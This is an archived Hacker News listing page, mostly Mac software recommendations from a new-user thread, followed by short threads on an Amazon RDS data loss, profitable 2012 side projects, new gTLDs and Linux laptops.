WeatherHD (Lap warming tool, also renders beautiful full screen weather for what's happening where you are/where you set it to)

Visual JSON (JSON validator, builder)

Crash Plan Pro (a pretty reasonably non-invasive offsite backup program)

1Password (Cross platform/Smartphone password autofill manager)

Camouflage (Hides everything on the desktop when you present)

Caffeine (Keeps the laptop awake while you're presenting)

Daisy Disk (Finds the crap you can delete and clean off the hard drive, quickly beautifully, and makes cleanup a joy)

Screenflow (Excellent videocasting/webcasting/tutorial making software) (Currently on sale at http://www.mupromo.com/ for half off its $99 pricetag with other stuff included)

Screenshots (Fantastic tool for taking a picture of exactly the section of the screen you want, and nothing more).

If you have iOS devices you like/use too, AirDisplay (makes an iPad or iPhone an extension of the mac desktop) and AirServer (makes the mac a mirror of the iOS screen using Airplay).

17
Jun8 17 hours ago 0 replies      
DVD Ripper is an excellent tool that I use often. If you deal with video you will want to install Handbrake, too (and of course vlc).

Geektool is an excellent tool that makes a lot of stats about your Mac on the desktop, it's infinitely customizable, but has a steep learning curve, maybe to be installed in the second batch.

I hate iCal, although it does integrate different calendars. I think it and Mail tool are some of the poorest designed Mac software (e.g. compared with Outlook) but what are you going to do.

Secrets is another advanced tool, that exposes many hidden setting for the Mac.

18
dewitt 17 hours ago 0 replies      
The first things I install on any Mac (and goodness knows there have been lot of them):

  - Google Chrome (http://chrome.google.com)
- iTerm2 (http://www.iterm2.com/)
- Xcode (http://developer.apple.com/xcode/)
- Homebrew (http://mxcl.github.com/homebrew)
- For emacs-snapshot, zsh, git, gnupg, etc.
- Google Drive (https://drive.google.com)
- Flux (http://stereopsis.com/flux/)
- TextMate (http://macromates.com/)
- VLC (http://www.videolan.org/vlc)
- Transmission (http://www.transmissionbt.com/)

Then, things like the Sonos controller, the Rdio and Spotify apps, Adobe Lightroom 4, Photoshop, etc.

But the above are the ones that seem to make it onto every new machine in the first day or two.

Enjoy!

19
kls 2 hours ago 0 replies      
If you do anything with a lot of private network web development Gasmask is a must. It is a great little host file switcher.

http://code.google.com/p/gmask/

20
kennu 16 hours ago 0 replies      
I don't know if many people agree with this, but I would also recommend you to give Apple's built-in OSX apps a try before installing replacements. I've used Mail, Calendar, Address Book and Terminal for many years without feeling a compelling need for alternatives. They usually work well if you're happy with the way they've been designed and don't try to bend them too much to your old habits.

Other apps that I always install on new Macs are Homebrew, VLC, Adium, MacIrssi and then the usual stuff that's on any PC (Spotify, Skype, Dropbox, Minecraft, F.lux).

And yeah it's important to install Xcode, otherwise your system doesn't have a C compiler so you can't do much. I think Git is also included with it.

21
rdrimmie 17 hours ago 0 replies      
I'm a big fan of Jumpcut (http://jumpcut.sourceforge.net/), a dedicated clipboard manager. Several other tools that include clipboard management have been mentioned but if you don't want the rest of the functionality, this is great for it.

iCal and Mail do a fantastic job syncing with Google and Exchange, so I use those.

22
jessor 17 hours ago 0 replies      
I purchased two apps within the first few weeks after my switch to a MBP:

1) Moom (move/zoom windows) - http://manytricks.com/moom/

2) TotalFinder (enhances the finder) - http://totalfinder.binaryage.com/

Some other must haves for me:

* MacVim

* Alfred

* Cyberduck

* Homebrew

* VLC

23
riffraff 17 hours ago 0 replies      
stuff I have installed

* rather than vanilla vim, try MacVim

* textmate is popular, though I don't use it

* tunnelblick for vpn management

* video: vlc, but mplayerx and MPlayer OSX Extended are popular options

* TotalTerminal (make terminal show/hide with a keystroke)

* cyberduck (ftp/s3/whatever file transfer client)

* keka as unarchiver

* xchat aqua as alternative irc client

24
shaufler 17 hours ago 0 replies      
Sublime Text 2 (http://www.sublimetext.com/) and MacVim (http://code.google.com/p/macvim/) are my preferred text editors.

Sparrow (http://sparrowmailapp.com/) is my favorite email client.

I can't live without a window resizer on OS X. Use SizeUp (http://www.irradiatedsoftware.com/sizeup/) for easy window maximizing, half splits, and quadrant resizing.

25
digitalengineer 8 hours ago 0 replies      
For security:

PREY: http://preyproject.com/
KNOX: https://agilebits.com/knox

Don't set your Mac to auto-login on your main account. I use an empty account that starts up automatically. It has no real data and Prey is installed on it. Set the screen to lock after 1 min of not using it. I keep important stuff in it's own Knox vault.

26
haar 17 hours ago 0 replies      

  Try out ZSH if you want to try something slightly different to Bash
Package Manager: Homebrew - https://github.com/mxcl/homebrew
Terminal/Emulator: iTerm2 - http://www.iterm2.com/
Vim running in iTerm2 via Homebrew
Chat Client: Adium - http://adium.im/
MySQL DB GUI: Sequel Pro - http://www.sequelpro.com/
Mail: Sparrow - http://sparrowmailapp.com/
Git GUI: GitX (L) - http://gitx.laullon.com/
Window "manager" : Shiftit - https://github.com/fikovnik/ShiftIt
General productivity: I love QuickSilver, however it's been crashing
quite frequently on me since I installed Lion, so I'm giving Alfred a try at the moment.

Note: all of the above are at least free (lite), if not completely free. I was thrown completely in the deep-end with terminal vim and just took to it as part of my "getting used to Mac" steps, which I think benefited me with respect to getting down with the nitty gritty of it and not complaining it was different to my Notepad++ experience prior on Windows.

27
tbeseda 17 hours ago 0 replies      
Can't recommend Sublime Text 2 enough.

Same with Sparrow for (non power use) GMail.

Currently enjoy Found (over Alfred and Quicksilver) as a Spotlight (native to OS X) replacement -- it's free in the "App Store"

28
mproud 9 hours ago 0 replies      
As far as graphic editors go, my favorite is Pixelmator.

Most people don't need Photoshop but still want something that supports layers, does image manipulation basics and feels like a happy OS X citizen.

On the other hand, GraphicConverter is the Swiss army knife of image formats and is even more powerful. GC can read virtually any image file ever created. It's a little more buggy, and the UI is less modern/fancy, but oh so handy.

29
tjr 17 hours ago 0 replies      
You might like Things, if you're into stuff like that:

http://culturedcode.com/things/

30
arn 17 hours ago 0 replies      
http://sites.google.com/site/yorufukurou/home-en

Yorufukurou - hardcore twitter client

31
Karma_Police 17 hours ago 1 reply      
I don't really see the point in Growl, and it is now a payed app, so you could skip it, unless your workflow requires you to be notified of something immediately.

Media player: I prefer mplayerx to VLC. mplayerx is on the app store.

Text: macvim and sublime text 2.

32
billyvg 16 hours ago 0 replies      
Janus MacVim distribution - editor

VLC - video player

iTunes - music

Alfred - launcher

Divvy - window management (can create hotkeys for resizing/positioning windows)

Kaleidoscope - great diff tool

I use the default Mail and Calendar apps

33
phr3aked0ut 14 hours ago 0 replies      
â€" MPlayerX (http://mplayerx.org/) Great standalone video player

- Perian (http://perian.org) Perian lets quicktime run almost any video format. Unfortunately it's not under active development. Still useful to have installed regardless.

â€" Google Chrome (http://www.google.com/chrome) Don't install Flash unless you have to. Chrome has it built in. I use Safari for most of my browsing and switch to Chrome when I want to use flash.

â€" If you aren't going to install Flash, then install YouTube5 (http://www.verticalforest.com/youtube5-extension/) It's a Safari extension that lets you watch YouTube videos natively without Flash.

- Day-O (http://www.shauninman.com/archive/2011/10/20/day_o_mac_menu_...) Adds a drop down calendar to the menubar.

- Alfred (http://www.alfredapp.com/) Another vote for Alfred. Much quicker and more powerful than Spotlight.

- 1Password (https://agilebits.com/onepassword) Remembers passwords/logins and makes it super easy to auto login to sites.

34
block 13 hours ago 0 replies      
These are the things I use daily (most are free!):

[Development]
Spotlight - OSX built in app launcher etc
SourceTree - GUI Git/Hg/SVN client.
HomeBrew - like apt, yum package manager
MacVim - Coming from the GUI world look at Janus
iTerm2 (Zsh, OhMyZSH plugins)
MAMP - Apache, MySQL etc dev env (like XAMPP)
$ CSSEdit - GUI CSS editor, mainly use vim
CyberDuck - (s)FTP
Sequel Pro - MySQL GUI, SSH connection
$ Parallels - VM

[Calendars] - iCal or $ Busy Cal
[Mail] - OSX Mail
[Office] - $ iWork, LibreOffice
[Feed Reader] - NetNewsWire
[Torrent] - Transmission
[Transcode] - Handbrake

[Utilities]
$ little snitch - Network monitor
MenuMeters - Free limited version of iStatMenus
Flip4mac WMV in Quicktime
Perian (Make QuickTime like VLC)
TwoUp - free window basic management
RightZoom - Maximise zoom button
ClipMenu - Multi Copy, Paste board
UnArchiver - File Decompression
CleanArchiver - File compression (sans .DS_Store)
NameChanger - GUI for mass renaming files
Onyx - System maintenance and set extra OS defaults
Click2Flash - Extension in Safari blocks flash defaults to HD mp4, right click to download video.

35
NonEUCitizen 14 hours ago 0 replies      
Xcode -- don't you want to write iOS apps?
36
markburns 17 hours ago 0 replies      
thoughtbot laptop script
https://github.com/thoughtbot/laptop
37
medusa666 16 hours ago 0 replies      
F.lux and Clipboard make my life better.
38
var 15 hours ago 0 replies      
once mountain lion releases, I don't think you need adium and growl
39
WalterSear 15 hours ago 0 replies      
bootcamp
15
Amazon RDS failure - data has been lost
80 points by akhkharu  3 days ago   47 comments top 7
1
EwanToo 3 days ago 5 replies      
RDS should not have lost data, and if I were a user of it, I'd be annoyed too.

At the same time, if you've not spotted by now that EBS (elastic block storage, which powers RDS) is not reliable and not to be trusted, then you have to look at yourself too.

EBS is by far the worst product AWS offer, you simply should not use it without a very good reason, and if you do need to use it, you have to assume any given drive image will disappear at any moment - as it did here.

Beyond that, any time you're running a database, no matter who the provider is, if you're not doing backups every day or hour, then you're not doing things right.

2
justincormack 3 days ago 2 replies      
Use multi AZ then, which performed as expected. There have been so many warnings about single AZ that you would hope people get it by now.
3
PaulHoule 3 days ago 2 replies      
If you had a database running on a dedi you could get trashed by a server failure too.

Good backups are the best defense.

4
debacle 3 days ago 0 replies      
But but...the cloud.
5
purephase 3 days ago 2 replies      
I'm not sure I understand the "which does not have actual data" part of your statement.

Could you explain that a bit more?

6
mschalle 2 days ago 0 replies      
Always assume Murphy's law will hold, regardless of what service provider you use.

If you were running your own database, you surely would have had rigorous backups because the responsibility was on you.

Assume that if a service can fail, it will. If data can be lost, it will be. Then, plan accordingly.

EDIT: grammar

7
bananashake 2 days ago 0 replies      
Why do you think the "Restore to Point in Time" failed to work? That puzzles me the most in this catastrophe and no has addressed it. In theory with Point-in-Time restoration you should not lose data from a failure on just the storage where the InnoDB is stored.
22
Ask HN: Any more info for the announced in-app hosted content from WWDC?
2 points by sunnynagra  1 day ago   discuss
23
Ask HN: Domain name in an ipv6 address
3 points by happyman  1 day ago   2 comments top 2
1
jameswyse 1 day ago 0 replies      
It would be cool to have a website or script which helps find words or sentences in a given ipv6 range.

I did find a blog post[1] about this by Pingdom in 2009

[1] http://royal.pingdom.com/2009/02/06/ipv6-playtime-hiding-sen...

2
mooism2 1 day ago 0 replies      
The face:b00c is within the /64 that you'd get as an ordinary residential user. Really it's just a question of your domain name being readable in hex.
24
Ask HN: Linux on a notebook
6 points by scarmig  1 day ago   7 comments top 6
1
RobGR 1 day ago 0 replies      
My next linux laptop will probably be a Dell XPS from the Sputnik project: http://bartongeorge.net/2012/05/07/introducing-project-sputn...

I think it's interesting because of the notion of having some sort of Chef or other configuration management on Github, and then being able to fork that for particular development purposes or preferences and switch between them. I gather from some of the other interviews that the sputnik project is aiming for something like that.

As far as hardware goes, I like Lenovo ThninkPads best, and the Dell E65xx series that kind of copy them are also pretty good. I expect to screw around googling driver settings and etc on any new hardware I buy, so I'm not to worried about "just working". Someone else's definition of everything "just working" probably isn't good enough for me anyway.

Running clones of specific production environments in a VM is a good idea, using it as your main everyday interface is not, IMHO.

2
signalsignal 1 day ago 0 replies      
If you have no ideological preference then use OS X. It uses a real unix and XQuartz is very up to date. You can use Homebrew, but I had some major issues with in the past so YMMV. I personally use MacPorts as Fink is too out of date as I have a 500gb hd and I prefer the 3rd party software to have separate dependencies from the core Mac system software.
3
ohgodthecat3 1 day ago 1 reply      
Well you could look here: http://www.ubuntu.com/certification/desktop/

But your laptop is already certified there, the sleep thing has been around in linux for a long time and the only thing is to make sure it goes to sleep before you put it away or shut it down when you are done.

Battery life again isn't going to improve with another laptop windows should be better for pretty much every supported laptop, you could look into buying a bigger battery maybe?

You could try System76 but I don't know that they will be better than an x220

4
falling 1 day ago 0 replies      
3) Don't try to bend OS X to be what it isn't: you will be frustrated, disappointed and will not succeed.

If you decide to learn to live with it, actually learn to live with it: you will have to adopt new usage patterns and tools. Don't try to turn it into Ubuntu, it's not.

5
oliwarner 1 day ago 0 replies      
Native is easy enough if you're willing to either shop around (our Samsung Q330 i3 took minimal messing around with for 11.10 and "just worked"™ for 12.04) or pay somebody.

You say you're willing to pay so take a look at people like Zareason and System76 -- people who design the hardware around what will work in Linux. You pay them over the odds, they support you.

But don't get hung up on some features. Battery life is one of those where everybody seems to get the same drop vs Windows. Yeah, I'd really like those bugs found and fixed but it's not going to affect my purchasing decisions. If I need long battery life, I just look at bigger batteries (or slower CPUs). Graphics is another interesting topic.

I'd also go out of my way to avoid dual-GPUs (Optimus et al) for the moment. They do work (bumblebee, ironhide, tbp, etc) but having to prepend things with optirun can get annoying - plus they're another power drain.

6
khyryk 1 day ago 0 replies      
Try using powertop to help tweak power settings Linux may have overlooked by default. It's in the repos, last time I checked.
25
A weird but useful bug in iOS 5.1.1
2 points by roquin  1 day ago   discuss
27
Ask HN: who started something in 2012 which is already profitable?
210 points by withinthreshold  8 days ago   190 comments top 6
1
there 8 days ago 6 replies      
I created a push notification service called Pushover (https://pushover.net/) and wrote its iOS and Android apps. I started the project in January and launched it in March (https://jcs.org/pushover).

In contrast to some competing free apps/services, the Pushover mobile apps are $3.99 which pays for the monthly hosting costs to keep the service running. Both apps are highly rated on both app stores and so far the app sales have paid for the domain name and other tangible development costs and are continuing to generate profit. I just purchased a Blackberry phone for development and plan to create a Blackberry app for the service.

2
coderdude 8 days ago 6 replies      
Beware of posts like this from what is basically a new account with only as much karma as this post has received.

Sharks and all that: http://news.ycombinator.com/item?id=4017843

(Am I paranoid much?)

3
markchristian 8 days ago 5 replies      
I launched a Mac utility app called DragonDrop (https://shinyplasticbag.com/dragondrop/) that got a lot of pretty good press (including getting fireballed â€" here's the HN discussion http://news.ycombinator.com/item?id=3946404).
4
einaregilsson 8 days ago 7 replies      
I created a few javascript card games, most of them in late 2011, but they really started earning this year. So far have made Spades, Hearts, Go Fish, Crazy Eights, Shithead and a couple of solitaires. Revenue has been steadily rising, and I'm getting ~1500$ next month. The nice thing is that they're completely maintenance free, there are no user accounts, no serverside anything, they just sit there and make money. http://www.spades-cardgame.com is one, the rest are linked from there.
5
jazzychad 8 days ago 1 reply      
I created ExportMyPosts after the Posterous acquisition so people could export and backup their blogs' data - http://exportmyposts.com/ - it has made more revenue than it costs for the hosting and servers, but not enough to pay a salary or anything. There are a few promo codes left, use HACKERNEWS at checkout.

I also made StepStats - http://StepStats.com/ - for better FitBit data visualization; it's free, but enough people have donated money that it has covered all costs involved.

6
mittermayr 8 days ago  replies      
I created fruji.com, a simple Twitter Analytics service and offered $5 and $25 accounts. People just keep buying accounts! It's fascinating!!!

This was a weekend project and it performs already way better (a few weeks in) than my 1.5 year startup (which is something completely different).

That's some scary shit right there. Purely fascinating.

28
Ask HN: Shouldn't gTLDs be non-generic?
19 points by aeurielesn  2 days ago   21 comments top 11
1
MPSimmons 2 days ago 1 reply      
Tragedy of the commons.

Plus greed on the part of ICANN. You can only sell one .google TLD, but there are thousands of relevant words in the dictionary for anyone with a deep enough coin purse.

2
darxius 2 days ago 1 reply      
What will this mean for Chrome users who use the address bar also as a search bar for their favorite search engine. If apple, for example, owns 'http://apple, what would happen when I type 'apple' in the search bar? What if I'm actually searching for pictures of apples? Scary stuff.
3
eli 2 days ago 1 reply      
Couldn't you say the same for .com domains? Is it fair that one company gets to own search.com?
4
gyardley 2 days ago 1 reply      
Heh. You want to see generic, check out Verisign's applications. '.com' in a whole bunch of scripts other than Latin - they've applied for the Cyrillic script 'ком', the Hebrew script 'קוֹם', and what I assume is the same thing in a bunch of languages I don't read.

On the other hand, I'm sure they'll make them publicly available - for the right price.

5
JamesPeterson 2 days ago 0 replies      
The ICANN administration is notorious for its motives. While a public organization, many of its decisions are clearly to benefit their own and are clearly not in the public benefit.
6
SkyMarshal 1 day ago 0 replies      
I've always thought the entire TLD taxonomy was an ugly, unsystematic hack, but I can't actually think of a better way to do it.

Were any alternative methods of allocating TLDs ever proposed?

7
personlurking 2 days ago 0 replies      
Generic gTLDs should remain free for all to use. Of course, this makes it hard for some companies whose names are generic but to me app.apple is easy enough to remember. Amazon.books? Perfect. Google.books? Works well, too. From a user/customer point of view, making generic gTLDs non-purchasable makes perfect sense.
8
watmough 2 days ago 0 replies      
Who cares. This is just another way to fleece idiots.

How are those non-standard .cc addresses working out for everyone.

9
buster 2 days ago 0 replies      
Thought the same. most of those are ridiculous...
10
lambada 2 days ago 0 replies      
I agree with your point, but your specific example is flawed as Apple did not apply for .app.
11
mparlane 2 days ago 1 reply      
The fact that apple will literally control http://apple/ is more scary.
29
What happened with the Hacker News podcast?
4 points by Tzeentch99  1 day ago   discuss
30
Show HN: DialASmile - tell people why you love them, even when you're not around
7 points by jodoglevy  2 days ago   4 comments top 2
1
X4 2 days ago 1 reply      
Integration:

Nice idea, but you should link that lonely island to twitter/facebook as (Mobile-/Web-)App for higher availability.

Design:

The Twitter bootstrap looks ugly. Why not use warmer colors and stock photos that spread a warmer feel. Customizable SmilePages that contain all the love at a secure/private link would also help spreading.

2
youngdev 2 days ago 1 reply      
Nice idea. Put more information on some pages i.e. About. Also are you using Twillo?
       cached 18 June 2012 16:05:01 GMT